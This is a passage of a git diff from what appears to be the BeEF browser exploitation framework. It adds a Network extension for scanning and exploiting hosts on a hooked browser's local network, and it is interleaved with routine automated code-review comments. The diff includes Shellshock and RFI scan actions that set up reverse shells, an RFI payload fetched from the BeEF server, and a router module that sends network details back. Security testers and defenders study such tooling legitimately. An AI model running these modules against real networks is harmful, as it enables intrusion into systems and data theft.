+ commands_statusbar.update_sending('Port scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipHost":ip,"ports":ports}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ }]
+ });
+ grid.rowCtxMenu.showAt(e.getXY());
+ },
+ afterrender: function(datagrid) {
+ datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+
+ }
+ });
+
+ var hosts_panel = new Ext.Panel({
+ id: 'network-host-panel-zombie-'+zombie.session,
+ title: 'Hosts',
+ items:[hosts_panel_grid],
+ layout: 'fit',
+ listeners: {
+ activate: function(hosts_panel) {
+ hosts_panel.items.items[0].store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+ }
+ });
+
+ /*
+ * The panel that displays all identified network services sorted by host
+ ********************************************/
+ var services_panel_store = new Ext.ux.data.PagingJsonStore({
+ storeId: 'network-services-store-zombie-'+zombie.session,
+ proxy: new Ext.data.HttpProxy({
+ url: '/api/network/services/'+zombie.session+'?token='+token,
+ method: 'GET'
+ }),
+ remoteSort: false,
+ autoDestroy: true,
+ autoLoad: false,
+ root: 'services',
+ fields: ['id', 'proto', 'ip', 'port', 'type'],
+ sortInfo: {field: 'ip', direction: 'ASC'}
+ });
+
+ var req_pagesize = 50;
+
+ var services_panel_bbar = new Ext.PagingToolbar({
+ pageSize: req_pagesize,
+ store: services_panel_store,
+ displayInfo: true,
+ displayMsg: 'Displaying network services {0} - {1} of {2}',
+ emptyMsg: 'No services to display'
+ });
+
+ var services_panel_grid = new Ext.grid.GridPanel({
+ id: 'network-services-grid-zombie-'+zombie.session,
+ store: services_panel_store,
+ bbar: services_panel_bbar,
+ border: false,
+ loadMask: {msg:'Loading network services...'},
+
+ viewConfig: {
+ forceFit: true
+ },
+
+ view: new Ext.grid.GridView({
+ forceFit: true,
+ emptyText: "No services",
+ enableRowBody:true
+ }),
+
+ columns: [
+ {header: 'Id', width: 5, sortable: true, dataIndex: 'id', hidden:true},
+ {header: 'IP Address', width: 10, sortable: true, dataIndex: 'ip', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Port', width: 5, sortable: true, dataIndex: 'port', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Protocol', width: 5, sortable: true, dataIndex: 'proto', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Type', width: 20, sortable: true, dataIndex: 'type', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
+ ],
+
+ listeners: {
+ rowclick: function(grid, rowIndex) {
+ var r = grid.getStore().getAt(rowIndex).data;
+ },
+ containercontextmenu: function(view, e) {
+ e.preventDefault();
+ },
+ contextmenu: function(e, element, options) {
+ e.preventDefault();
+ },
+ rowcontextmenu: function(grid, rowIndex, e) {
+ e.preventDefault();
+ grid.getSelectionModel().selectRow(rowIndex);
+ if (!!grid.rowCtxMenu) {
+ grid.rowCtxMenu.destroy();
+ }
+ var record = grid.selModel.getSelected();
+ var ip = record.get('ip');
+ var port = record.get('port');
+ var proto = record.get('proto');
+ grid.rowCtxMenu = new Ext.menu.Menu({
+ items: [{
+ text: 'Scan ('+ip+':'+port+'/'+proto+')',
+ iconCls: 'network-host-ctxMenu-host',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ handler: function() {
+ var mod_id = get_module_id("internal_network_fingerprinting");
+ commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ handler: function() {
+ var mod_id = get_module_id("cross_origin_scanner");
+ commands_statusbar.update_sending('CORS scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Shellshock Scan',
+ iconCls: 'network-host-ctxMenu-shellshock',
+ handler: function() {
+ var mod_id = get_module_id("shell_shock_scanner");
+ var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
+ if (!lhost) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var lport = prompt("Enter local port for connect back shell:", 'LPORT');
+ if (!lport) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ alert("Now start your reverse shell handler on " + lhost + ':' + lport);
+ commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'RFI Scan',
+ iconCls: 'network-host-ctxMenu-php',
+ handler: function() {
+ var mod_id = get_module_id("rfi_scanner");
+ var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
+ if (!lhost) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var lport = prompt("Enter local port for connect back shell:", 'LPORT');
+ if (!lport) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ alert("Now start your reverse shell handler on " + lhost + ':' + lport);
+ commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ }]
+ });
+ grid.rowCtxMenu.showAt(e.getXY());
+ },
+ afterrender: function(datagrid) {
+ datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+
+ }
+ });
+
+ var services_panel = new Ext.Panel({
+ id: 'network-services-panel-zombie-'+zombie.session,
+ title: 'Services',
+ items:[services_panel_grid],
+ layout: 'fit',
+ listeners: {
+ activate: function(services_panel) {
+ services_panel.items.items[0].store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+ }
+ });
+
+ /*
+ * The Network tab constructor
+ ********************************************/
+ ZombieTab_Network.superclass.constructor.call(this, {
+ id: 'zombie-network-tab-zombie-'+zombie.session,
+ title: 'Network',
+ activeTab: 0,
+ viewConfig: {
+ forceFit: true,
+ stripRows: true,
+ type: 'fit'
+ },
+ items: [hosts_panel, services_panel],
+ bbar: commands_statusbar,
+ listeners: {
+ }
+ });
+
+};
+
+Ext.extend(ZombieTab_Network, Ext.TabPanel, {});
diff --git a/extensions/network/api.rb b/extensions/network/api.rb
new file mode 100644
index 000000000..078f46010
--- /dev/null
+++ b/extensions/network/api.rb
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Extension
+ module Network
+
+ module RegisterHttpHandler
+
+ BeEF::API::Registrar.instance.register(BeEF::Extension::Network::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
+
+ # Mounts the handler for processing network host info.
+ #
+ # @param beef_server [BeEF::Core::Server] HTTP server instance
+ def self.mount_handler(beef_server)
+ beef_server.mount('/api/network', BeEF::Extension::Network::NetworkRest.new)
+ end
+
+ end
+ end
+ end
+end
diff --git a/extensions/network/config.yaml b/extensions/network/config.yaml
new file mode 100644
index 000000000..a85fb53f0
--- /dev/null
+++ b/extensions/network/config.yaml
@@ -0,0 +1,12 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ extension:
+ network:
+ name: 'Network'
+ enable: true
+ authors: ["bcoles"]
+ description: "This extension facilitates interaction with hosts on a zombie browser's local area network(s). It provides a point and click interface for performing a variety of actions including host discovery, fingerprinting and exploitation. Identified network hosts are available in the Network -> Hosts panel. Identified network services are available in the Network -> Services panel. Right-click a host or service for more options."
diff --git a/extensions/network/extension.rb b/extensions/network/extension.rb
new file mode 100644
index 000000000..f76877c19
--- /dev/null
+++ b/extensions/network/extension.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+module Extension
+module Network
+
+ extend BeEF::API::Extension
+
+ @short_name = 'network'
+ @full_name = 'Network'
+ @description = "This extension provides a simple interface for interacting with hosts on a zombie browser's local area networks."
+
+end
+end
+end
+
+require 'extensions/network/network'
+require 'extensions/network/models/network_host'
+require 'extensions/network/models/network_service'
+require 'extensions/network/api'
+require 'extensions/network/rest/network'
+
+require 'dm-serializer'
+
diff --git a/extensions/network/models/network_host.rb b/extensions/network/models/network_host.rb
new file mode 100644
index 000000000..0de5ce0d4
--- /dev/null
+++ b/extensions/network/models/network_host.rb
@@ -0,0 +1,31 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Core
+ module Models
+ #
+ # Table stores each host identified on the zombie browser's network(s)
+ #
+ class NetworkHost
+
+ include DataMapper::Resource
+ storage_names[:default] = 'network_host'
+
+ property :id, Serial
+
+ property :hooked_browser_id, Text, :lazy => false
+ property :ip, Text, :lazy => false
+ property :hostname, String, :lazy => false
+ property :type, String, :lazy => false # proxy, router, gateway, dns, etc
+ property :os, String, :lazy => false
+ property :mac, String, :lazy => false
+ property :cid, String, :lazy => false # command id or 'init'
+
+ end
+
+ end
+ end
+end
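Review bot: Neither `NetworkHost` here nor `NetworkService` in extensions/network/models/network_service.rb declares a validation or uniqueness constraint, so each report for the same browser and address becomes a new row and any string passed as `:ip` is stored as given. The callers added elsewhere in this commit build records from data returned by the hooked browser, so the model is the one place where a format check would cover all of them. Assuming dm-validations is loaded, I would add `validates_format_of :ip, :with => /\A[\d\.]+\z/` to both models. Callers could then use `first_or_create` keyed on `:hooked_browser_id` and `:ip` instead of `new` followed by `save`.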
diff --git a/extensions/network/models/network_service.rb b/extensions/network/models/network_service.rb
new file mode 100644
index 000000000..c806b2aa1
--- /dev/null
+++ b/extensions/network/models/network_service.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Core
+ module Models
+ #
+ # Table stores each open port identified on the zombie browser's network(s)
+ #
+ class NetworkService
+
+ include DataMapper::Resource
+ storage_names[:default] = 'network_service'
+
+ property :id, Serial
+
+ property :hooked_browser_id, Text, :lazy => false
+ property :proto, String, :lazy => false
+ property :ip, Text, :lazy => false
+ property :port, String, :lazy => false
+ property :type, String, :lazy => false
+ property :cid, String, :lazy => false # command id or 'init'
+
+ end
+
+ end
+ end
+end
diff --git a/extensions/network/network.rb b/extensions/network/network.rb
new file mode 100644
index 000000000..9a8eed9e2
--- /dev/null
+++ b/extensions/network/network.rb
@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+module Extension
+module Network
+
+
+end
+end
+end
diff --git a/extensions/network/rest/network.rb b/extensions/network/rest/network.rb
new file mode 100644
index 000000000..07096aaca
--- /dev/null
+++ b/extensions/network/rest/network.rb
@@ -0,0 +1,169 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+ module Extension
+ module Network
+
+ # This class handles the routing of RESTful API requests that interact with network services on the zombie's LAN
+ class NetworkRest < BeEF::Core::Router::Router
+
+ # Filters out bad requests before performing any routing
+ before do
+ config = BeEF::Core::Configuration.instance
+ @nh = BeEF::Core::Models::NetworkHost
+ @ns = BeEF::Core::Models::NetworkService
+
+ # Require a valid API token from a valid IP address
+ halt 401 unless params[:token] == config.get('beef.api_token')
+ halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip)
+
+ headers 'Content-Type' => 'application/json; charset=UTF-8',
+ 'Pragma' => 'no-cache',
+ 'Cache-Control' => 'no-cache',
+ 'Expires' => '0'
+ end
+
+ # Returns the entire list of network hosts for all zombies
+ get '/hosts' do
+ begin
+ hosts = @nh.all
+ count = hosts.length
+
+ result = {}
+ result[:count] = count
+ result[:hosts] = hosts.to_json
+ result.to_json
+ rescue StandardError => e
+ print_error "Internal error while retrieving host list (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns the entire list of network services for all zombies
+ get '/services' do
+ begin
+ services = @ns.all
+ count = services.length
+
+ result = {}
+ result[:count] = count
+ result[:services] = services.to_json
+ result.to_json
+ rescue StandardError => e
+ print_error "Internal error while retrieving service list (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns all hosts given a specific hooked browser id
+ get '/hosts/:id' do
+ begin
+ id = params[:id]
+
+ hosts = @nh.all(:hooked_browser_id => id)
+ count = hosts.length
+
+ result = {}
+ result[:count] = count
+ result[:hosts] = hosts
+ result.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving hosts list for hooked browser with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns all services given a specific hooked browser id
+ get '/services/:id' do
+ begin
+ id = params[:id]
+
+ services = @ns.all(:hooked_browser_id => id)
+ count = services.length
+
+ result = {}
+ result[:count] = count
+ result[:services] = services
+ result.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving service list for hooked browser with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns a specific host given its id
+ get '/host/:id' do
+ begin
+ id = params[:id]
+
+ host = @nh.all(:id => id)
+ raise InvalidParamError, 'id' if host.nil?
+ halt 404 if host.empty?
+
+ host.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving host with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Returns a specific service given its id
+ get '/service/:id' do
+ begin
+ id = params[:id]
+
+ service = @ns.all(:id => id)
+ raise InvalidParamError, 'id' if service.nil?
+ halt 404 if service.empty?
+
+ service.to_json
+ rescue InvalidParamError => e
+ print_error e.message
+ halt 400
+ rescue StandardError => e
+ print_error "Internal error while retrieving service with id #{id} (#{e.message})"
+ halt 500
+ end
+ end
+
+ # Raised when invalid JSON input is passed to an /api/network handler.
+ class InvalidJsonError < StandardError
+
+ DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/network handler'
+
+ def initialize(message = nil)
+ super(message || DEFAULT_MESSAGE)
+ end
+
+ end
+
+ # Raised when an invalid named parameter is passed to an /api/network handler.
+ class InvalidParamError < StandardError
+
+ DEFAULT_MESSAGE = 'Invalid parameter passed to /api/network handler'
+
+ def initialize(message = nil)
+ str = "Invalid \"%s\" parameter passed to /api/network handler"
+ message = sprintf str, message unless message.nil?
+ super(message)
+ end
+
+ end
+
+ end
+
+ end
+ end
+end
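Review bot: `get '/hosts'` and `get '/services'` store `hosts.to_json` / `services.to_json` in the result hash and then call `result.to_json`, so the list reaches the client as a JSON-encoded string nested inside the JSON document, while `get '/hosts/:id'` and `get '/services/:id'` store the collection itself. Unless a consumer outside this diff depends on the nested string, use `result[:hosts] = hosts` and `result[:services] = services` in both routes. In the `before` filter the token is compared with `==`; `halt 401 unless Rack::Utils.secure_compare(config.get('beef.api_token').to_s, params[:token].to_s)` keeps that comparison constant-time. `InvalidParamError::DEFAULT_MESSAGE` is never used, because `initialize` passes `nil` to `super` when no message is given.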
diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml
index 977ce84c3..a9e8cf969 100644
--- a/modules/debug/test_cors_request/config.yaml
+++ b/modules/debug/test_cors_request/config.yaml
@@ -11,9 +11,11 @@ beef:
name: "Test CORS Request"
description: "Test the beef.net.cors.request function by retrieving a URL."
authors: ["bcoles"]
+ # http://caniuse.com/cors
target:
working: ["ALL"]
not_working:
+ # CORS is partially supported on IE 8 & 9
IE:
min_ver: 6
max_ver: 7
@@ -22,7 +24,10 @@ beef:
max_ver: 11
C:
min_ver: 1
- max_ver: 2
+ max_ver: 3
S:
min_ver: 1
max_ver: 3
+ F:
+ min_ver: 1
+ max_ver: 3
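Review bot: The new `F:` key under `not_working` does not match the browser code the other module configs in this commit use for Firefox, which is `FF` (for example `working: ["C", "FF"]`), so the Firefox 1–3 exclusion is probably never applied. If Firefox is what is meant, the key should be `FF:`. The same `F:` entry is added in modules/network/cross_origin_scanner/config.yaml.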
diff --git a/modules/exploits/rfi_scanner/command.js b/modules/exploits/rfi_scanner/command.js
index 9c2170421..05d6240b7 100644
--- a/modules/exploits/rfi_scanner/command.js
+++ b/modules/exploits/rfi_scanner/command.js
@@ -10,7 +10,7 @@ beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var base_dir = '<%= @base_dir %>';
- var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
+ var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
var target = rproto + '://' + rhost + ':' + rport + base_dir;
var wait = '<%= @wait %>';
diff --git a/modules/exploits/rfi_scanner/config.yaml b/modules/exploits/rfi_scanner/config.yaml
index c0e52770a..5252a4f2b 100644
--- a/modules/exploits/rfi_scanner/config.yaml
+++ b/modules/exploits/rfi_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Exploits"
name: "RFI Scanner"
- description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the fuzzdb RFI list. Many of these vulns require the target to have register_globals enabled in the PHP config.
The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.
This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
+ description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the fuzzdb RFI list. Many of these vulns require the target to have register_globals enabled in the PHP config.
The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
authors: ["bcoles"]
target:
working: ["ALL"]
diff --git a/modules/exploits/rfi_scanner/module.rb b/modules/exploits/rfi_scanner/module.rb
index 83d5ab4ad..70c22fa64 100644
--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -149,11 +149,8 @@ EOS
def self.options
configuration = BeEF::Core::Configuration.instance
- proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
- beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
lhost = "" if lhost == "0.0.0.0"
- url = "#{proto}://#{lhost}:#{beef_port}"
return [
{ 'name' => 'rproto',
'type' => 'combobox',
@@ -173,7 +170,6 @@ EOS
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
- { 'name' => 'payload_url', 'ui_label' => 'BeEF server URL', 'value' => url },
{ 'name' => 'payload',
'type' => 'combobox',
'ui_label' => 'Payload',
diff --git a/modules/exploits/router/asus_rt_series_get_info/command.js b/modules/exploits/router/asus_rt_series_get_info/command.js
index 41628fc89..389724480 100644
--- a/modules/exploits/router/asus_rt_series_get_info/command.js
+++ b/modules/exploits/router/asus_rt_series_get_info/command.js
@@ -31,7 +31,8 @@ beef.execute(function() {
beef.debug(target_ip + " - gathering info completed");
beef.net.send("<%= @command_url %>", <%= @command_id %>,
- "clients=" + clients +
+ "ip=" + target_ip +
+ "&clients=" + clients +
"&wanip=" + wanip +
"&netmask=" + netmask +
"&gateway=" + gateway +
diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb
index 0c476a671..d3e58601b 100644
--- a/modules/exploits/router/asus_rt_series_get_info/module.rb
+++ b/modules/exploits/router/asus_rt_series_get_info/module.rb
@@ -13,6 +13,54 @@ class Asus_rt_series_get_info < BeEF::Core::Command
def post_execute
save({'result' => @datastore['result']})
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # log the network hosts
+ if @datastore['results'] =~ /ip=(.+)&clients=(.+)&wanip=(.+)&netmask=(.+)&gateway=(.+)&dns=(.+)/
+ ip = "#{$1}"
+ clients = "#{$2}"
+ wanip = "#{$3}"
+ netmask = "#{$4}"
+ gateway = "#{$5}"
+ dns_servers = "#{$6}"
+
+ if !ip.nil?
+ print_debug("Hooked browser found Asus RT series router [ip: #{ip}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid)
+ r.save
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => 80, :type => 'HTTP Server', :cid => cid)
+ r.save
+ end
+ clients.scan(/([\d\.]+,[:\dA-F]{17})/).flatten.each do |client|
+ next if client.nil?
+ if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/
+ ip = $1
+ mac = $2
+ print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
+ r.save
+ end
+ end
+ if !gateway.nil?
+ print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid)
+ r.save
+ end
+ if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/
+ dns_servers.split(/ /).uniq.each do |dns|
+ print_debug("Hooked browser found DNS server [ip: #{dns}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
+ r.save
+ end
+ end
+ end
+ end
+
end
end
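Review bot: `ip` and `gateway` are saved exactly as captured by the greedy `(.+)` groups from the string the hooked browser sent, while `clients` and `dns_servers` are checked against a digits-and-dots pattern before anything is stored. The guards `if !ip.nil?` and `if !gateway.nil?` never fail, because `"#{$1}"` always yields a String, so they filter nothing. I would replace them with a format check such as `if ip =~ /\A[\d\.]+\z/` (and the same for `gateway`) so that only address-shaped values reach `NetworkHost`. The `ip=(.+)` capture in modules/network/cross_origin_scanner/module.rb is stored the same way, and its `!ip.nil? && !port.nil?` test is likewise always true once the regex has matched.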
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml
index de8941680..b75085865 100755
--- a/modules/host/get_internal_ip/config.yaml
+++ b/modules/host/get_internal_ip/config.yaml
@@ -8,9 +8,8 @@ beef:
get_internal_ip:
enable: true
category: "Host"
- name: "Get Internal IP"
- description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet"
+ name: "Get Internal IP (Java)"
+ description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet.
The browser must have Java enabled and configured to allow execution of unsigned Java applets."
authors: ["antisnatchor"]
target:
- working: ["IE", "FF", "O"]
- user_notify: ["C", "S"]
+ user_notify: ["ALL"]
diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb
index d0c436292..79439b23a 100755
--- a/modules/host/get_internal_ip/module.rb
+++ b/modules/host/get_internal_ip/module.rb
@@ -20,6 +20,22 @@ class Get_internal_ip < BeEF::Core::Command
content['Result'] = @datastore['result']
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class')
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # save the network host
+ if @datastore['results'] =~ /^([\d\.]+)$/
+ ip = $1
+ print_debug("Hooked browser has network interface #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+ r.save
+ end
+ end
+
end
end
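Review bot: The check `@datastore['results'] =~ /^([\d\.]+)$/` uses `^` and `$`, which in Ruby match at every line boundary, so a multi-line result passes as long as one of its lines is address-shaped. Only the captured line is stored, so the saved value stays clean, but the condition accepts input it appears meant to reject; `/\A([\d\.]+)\z/` anchors the whole string. The per-address test `next unless ip =~ /^[\d\.]+$/` in modules/host/get_internal_ip_webrtc/module.rb uses the same anchors and should become `/\A[\d\.]+\z/` for consistency. `post_execute` begins above this hunk.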
diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js
index 43e00a02d..277591d05 100755
--- a/modules/host/get_internal_ip_webrtc/command.js
+++ b/modules/host/get_internal_ip_webrtc/command.js
@@ -35,7 +35,8 @@ beef.execute(function() {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
- beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
+ beef.debug("Found IPs: "+ displayAddrs.join(","))
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","));
}
function grepSDP(sdp) {
diff --git a/modules/host/get_internal_ip_webrtc/config.yaml b/modules/host/get_internal_ip_webrtc/config.yaml
index 77dc387df..f0dc77703 100755
--- a/modules/host/get_internal_ip_webrtc/config.yaml
+++ b/modules/host/get_internal_ip_webrtc/config.yaml
@@ -13,4 +13,4 @@ beef:
authors: ["xntrik", "@natevw"]
target:
working: ["C", "FF"]
- unknown: ["All"]
+ not_working: ["ALL"]
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
index fd2c4dddb..7d497d1b7 100755
--- a/modules/host/get_internal_ip_webrtc/module.rb
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -9,6 +9,29 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # save the network host
+ if @datastore['results'] =~ /IP is ([\d\.,]+)/
+ ips = $1.to_s.split(/,/)
+ if !ips.nil? && !ips.empty?
+ os = BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName')
+ ips.uniq.each do |ip|
+ next unless ip =~ /^[\d\.]+$/
+ next if ip =~ /^0\.0\.0\.0$/
+ print_debug("Hooked browser has network interface #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid)
+ r.save
+ end
+ end
+ end
+ end
+
end
end
diff --git a/modules/network/cross_origin_scanner/command.js b/modules/network/cross_origin_scanner/command.js
index 440c86b17..382dc5f17 100644
--- a/modules/network/cross_origin_scanner/command.js
+++ b/modules/network/cross_origin_scanner/command.js
@@ -16,22 +16,44 @@ beef.execute(function() {
return;
}
- // set target IP range
